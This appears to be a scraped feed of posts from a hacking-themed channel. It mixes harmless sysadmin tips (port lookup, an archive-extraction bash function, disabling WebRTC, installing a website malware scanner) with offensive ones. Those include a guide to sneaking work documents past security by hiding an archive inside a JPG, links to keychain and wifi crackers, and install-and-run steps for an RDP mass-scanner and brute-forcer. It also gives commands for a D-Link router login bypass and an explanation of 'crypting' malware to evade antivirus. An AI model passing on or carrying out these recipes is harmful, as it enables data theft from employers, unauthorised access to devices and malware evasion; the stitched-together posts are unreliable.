Now all ubuntu users should update their systems.
New Vulnerability in Ubuntu gdm3 could allow attackers to gain root access.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🖧 Accessing ESXi console screen from SSH session :

1) As you can imagine, SSH access to ESXi host is required
Before accessing the DCUI from an SSH session, it is important to note that making any changes to the network settings may result in management issues via vCenter Server, vSphere Client, or SSH.
Network changes should only be done through a console session (eg DRAC, iLO, KVM) to avoid host management issues.

2) Changing the network settings using this command may render the host unusable and may require a reboot to recover.

Run this command to access DCUI from an SSH session:

~ # dcui

3) To exit DCUI, press Ctrl + C.

DCUI will provide you with this screen, which is colorless

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

macOS keychain cracking tool.

https://github.com/macmade/KeychainCracker

🦑How To Build Mobile App Without Programming - Build 14 Apps!
FREE

Build Audio App
Build Mortgage Calculator App
Build Count Down Timer App
Build Email Marketing App
Build Messenger App - With Google and Facebook Login Features
Build Slot Machine App
Build Voice Recorder App
Build Global Positioning System (GPS) App
Build Photo Sharing App
Build eBook App - Turn any PDF into eBook App
Build News Feed App
Build Memory Game App
Build Push Notifications App
Build Geo-Fencing App
Build Facebook App
Bypass Mobile App's Web Page Link to Mobile App Link
Customize Mobile App Tap - Better User Interface (UI) Design and Better User Experience (UX) Design
Discover Mobile App Monetization Secrets
Discover Precaution Steps That Need To Be Taken on Live Ads
Learn How To Use Google Analytics To Track Mobile App Activity
Learn How To Use Adobe Photoshop and Adobe Illustrator in Just 20 Minutes!
Discover Online Tool To Quickly Generate Different Sizes of Mobile App Icons
Discover Ways To Engage With Mobile App Users
Learn How To Export Application Binary and Upload to Multiple Mobile App Stores

https://www.udemy.com/course/how-to-build-mobile-app-without-programming-skills/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to quietly take a document from work👨⚕️

1) So, again, the harsh security officers from the security departments prevent you from squeezing documents from work?) How to transfer the necessary document to yourself without a palette?

2) The main idea is to make the document look like a harmless picture so that we can safely send it by mail or drop it onto a USB-flash, without fear of being burned. comrades of security guards will reflect that all actions were performed with a picture.

3) So we have at our disposal a file with service information “Doc.rtf” and a picture “picture.jpg” (This can be a photo from a cooperative, a volunteer clean-up, etc.)

4) First, we archive a text file with an archiver (in the example I used 7-zip) in the “.rar” format and get Doc.rar.

5) Now to blind them, we type in the command line:

D: \ shared> copy / b picture.Jpg + doc.rar rezult.jpg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE WIFI CRACKER APPLICATION FOR ANDROID:

Step 1: before using this application you have to FORGET your current wifi connection other the scan will not work and you will be unable to attempt a connection.


Step 2: Before you can view any networks around you, you must enable location services through your settings. New android permissions require location services due to the network dealing with IP addresses.

> Download:
https://github.com/trevatk/Wifi-Cracker/tree/master/newAPK
https://github.com/trevatk/Wifi-Cracker/tree/master/oldAPK
https://github.com/trevatk/Wifi-Cracker

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🔍 What process is listening on a port on Windows?

A) Using the command line
Use the following command to find out the process id (pid) listening on port 433 .

You can change this value to look for a different port.

netstat -aon | findstr ": 443" | findstr "LISTENING"
Conclusion:

TCP 0.0.0.0:443 0.0.0.0 0 LISTENING 2180
TCP 127.0.0.1:44312 0.0.0.0 0 LISTENING 4620
TCP [::]: 443 [::]: 0 LISTENING 2180


The last column of the output displays the process ID.

The output shows the pid is 2189 and 4620 for processes listening on port 443.

Use this process ID with the task list command to find the process name.

> tasklist / fi "pid eq 2190"

B) Using PowerShell Get-Process
The second method uses a PowerShell command to identify the process running on a specific port on Windows.

Start a PowerShell terminal and run the following command to find the name of the process running on port 443.

You can change the port number to check for other ports.

Get-Process -Id (Get-NetTCPConnection -LocalPort 443) .OwningProcess

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RDP HACKING
Script for automatic scanning of the address list for the presence of open 3389 ports, and then selecting the method and starting busting pair login / password.

To work correctly, the script requires the establishment: masscan, curl and FreeRDP.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/getdrive/Lazy-RDP

2) cd Lazy-RDP && chmod +x hydra/configure hydra/hydra src/rdp_brute.sh patator.py start INSTALL

3) Installing dependencies

./INSTALL

4) Running the script

./start

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to operate HNAP :

There are a couple of tools available to operate the HNAP.

Hnap0wn

The Hnap0wn tool was introduced 10 years ago. This is an exploit to bypass the administrative login for HNAP-enabled D-Link routers.

1) Now it can be downloaded from the following links (the versions are not identical! In this tutorial I use the first one):

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
https://web.archive.org/web/20140727021850/http://www.sourcesec.com/Lab/hnap0wn.tar.gz
Download and unpack from the command line:

2) mkdir hnap0wn

3) cd hnap0wn

4) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz

5) tar xvzf 11101.tar.gz

6) This tool allows you to check if there is a vulnerability that allows you to perform actions without specifying a password, as well as view information from a device using a password or without a password if the device is vulnerable.

In the xml folder that comes with this program, there are several .xml files to do typical things.

🦑Example command:


./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ISPProtect - a malware scanner for websites:

A) ISPProtect contains 5 scanning engines:

—Malware scanner using signature method.
Heuristic analysis
—Scan to show installation directories for legacy CMS systems.
—A scan that shows you all the legacy WordPress plugins of the entire server.
—Database content scanner that checks MySQL databases for potentially malicious content.
—ISPProtect is not free software, but there is a free trial version that you can use without registration to test it or clean up an infected system.

B) ISPProtect requires PHP and ClamAV to be installed on the server, this should be the case on most hosting systems.

ClamAV is used by ISPProtect in the first scan layer with its own set of ISPProtect malware signatures.

C) If you don't have PHP installed yet run:

# apt-get install php7.0-cli clamav
On debian or Ubuntu:

# apt-get install php7.2-cli clamav
Fedora or CentOS:

yum install php

D) To install ISPProtect run the following commands:

mkdir -p / usr / local / ispprotect
chown -R root: root / usr / local / ispprotect
chmod -R 750 / usr / local / ispprotect
cd / usr / local / ispprotect
wget http://www.ispprotect.com/download/ispp_scan.tar.gz
tar xzf ispp_scan.tar.gz
rm -f ispp_scan.tar.gz
ln -s / usr / local / ispprotect / ispp_scan / usr / local / bin / ispp_scan

E) To start ISPProtect, enter:

ispp_scan
The scanner automatically checks for updates, then prompts you for a key (enter "trial" here) and then prompts you for the path to websites, usually / var / www.

Please enter scan key: <- trial
Please enter path to scan: <- / var / www

The scanner will start scanning. The scanning progress is displayed.

The names of the infected files are displayed on the screen at the end of the scan, and the results are saved in the sin file in the ISPProtect installation directory for later use:

F) After the scan is completed, you will find the results also in the following files:
Malware => /usr/local/ispprotect/found_malware_20180605115005.txt
Wordpress => /usr/local/ispprotect/software_wordpress_20180605115005.txt
Joomla => /usr/local/ispprotect/software_joomla_20180605115005.txt
Drupal => /usr/local/ispprotect/software_drupal_20180605115005.txt
Mediawiki => /usr/local/ispprotect/software_mediawiki_20180605115005.txt
Contao => /usr/local/ispprotect/software_contao_20180605115005.txt
Magentocommerce => /usr/local/ispprotect/software_magentocommerce_20180605115005.txt
Woltlab Burning Board => /usr/local/ispprotect/software_woltlab_burning_board_20180605115005.txt
Cms Made Simple => /usr/local/ispprotect/software_cms_made_simple_20180605115005.txt
Mysqldumper => /usr/local/ispprotect/software_mysqldumper_20180605115005.txt
Starting scan level 1 ...
Scanning 3471 files now ...

G) To start ISPProtect automatically as a night cronjob, create a cron file with nano:

?
nano /etc/cron.d/ispprotect
and insert the following line:

root /usr/local/ispprotect/ispp_scan --update && /usr/local/ispprotect/ispp_scan --path=/var/www --email-results=root@localhost --non-interactive --scan-key=AAA-BBB-CCC-DDD</pre>

<a href="https://ispprotect.com/"></a> ]
<p class="command"> ispp_scan --help

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to prevent WebRTC leaks in browsers?

1) Despite all this, WebRTC also poses a threat to online privacy and security.

So, WebRTC is not very good for online privacy and you should disable it if it's not useful.

In Google Chrome or Chromium browser, the local IP address is automatically allocated by default on all desktop OS platforms, Windows, macOS and Linux.

2) However, in Firefox, the local IP address is provided via WebRTC, however it can be easily fixed with plugins like uBlock Origin.

3) Some less popular browsers for Linux users such as Falkon, Midori, etc. use either WebKit or WebEngine as their rendering engine, are vulnerable to WebRTC leaks, and there is no easy way to fix this problem.

But the real threat to the Android platform, the Android Chrome browser and many other popular browsers are affected by the WebRTC leak.

4) Even worse, there is no easy way to install plugins / add-ons on Android to prevent WebRTC leaks.

This is when you should be especially careful if you truly value your online privacy.

You can use Firefox beta on Android to install plugins like uBlock Origin.

🦑How to disable WebRTC in Firefox browser?

1)Enter in the browser line:

about:config


2) Click “Accept Risk and Continue”

3) Enter in the search bar:

media.peerconnection.enabled


4) Double click on the value true and it becomes false


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 Bash function for extracting file archives of various types:

A) Open your ~ / .bashrc file:

$ nano ~/.bashrc
Add the following snippet at the end:

# Bash Function To Extract File Archives Of Various Types
extract () {
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) rar x $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}

B) Press Ctrl + o and press ENTER to save the file and then press Ctrl + x to exit the file.


C) Run the following command for the changes to take effect:
$ source ~/.bashrc
From now on, you can simply call this function to extract archives of various types.

For example, I'm going to extract a .7z archive file using the command:

$ extract archive.7z
Output example:

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_IN,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i3-2350M CPU @ 2.30GHz (206A7),ASM)

Scanning the drive for archives:
1 file, 16013693 bytes (16 MiB)

Extracting archive: archive.7z
--
Path = archive.7z
Type = 7z
Physical Size = 16013693
Headers Size = 1204
Method = LZMA:23
Solid = +
Blocks = 1

Everything is Ok

Folders: 21
Files: 37
Size: 16625007
Compressed: 16013693
Likewise, to extract .zip files, the command would be:
$ extract archive.zip

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crypt / Why? / Issue price

Crypt, crypt - the process of hiding your malicious code from antiviruses (hereinafter referred to as AB).

> This is the process of modifying the code of your file (exe / dll) in such a way that the operability of the file itself is preserved and all antiviruses will consider that the file is harmless to the system.

> This is accomplished in a variety of ways. The simplest ones are adding garbage sections or false calls and jumps to the file code.

> This simplest method has long lost its relevance due to the development of antiviruses and logistic methods of file analysis (heuristic analysis).

> Now more complex methods are used, which include a huge complex of file file modifications. And the more sophisticated the methods, the longer your file will remain "clean" for AB.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁]